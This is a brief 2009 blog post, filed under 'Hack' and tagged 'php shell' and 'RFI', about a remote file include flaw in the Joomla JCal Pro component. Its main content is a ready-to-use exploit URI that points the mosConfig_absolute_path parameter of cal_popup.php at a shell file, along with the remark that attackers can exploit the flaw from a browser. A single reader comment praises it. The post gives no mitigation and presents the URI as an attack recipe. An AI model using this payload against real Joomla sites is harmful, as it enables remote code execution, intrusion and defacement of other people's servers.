Joomla! JCal Pro Component ‘mosConfig_absolute_path’ Parameter Remote File Include Vulnerability
1 Comment
December 24, 2009, 1:42 am
Filed under: Hack | Tags: bot, Hack, hacking, php shell, remote file include, remote file inclusion, RFI
Filed under: Hack | Tags: bot, Hack, hacking, php shell, remote file include, remote file inclusion, RFI
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=shell.txt
1 Comment
nice topic
Comment by bacayuk February 4, 2010 @ 5:23 am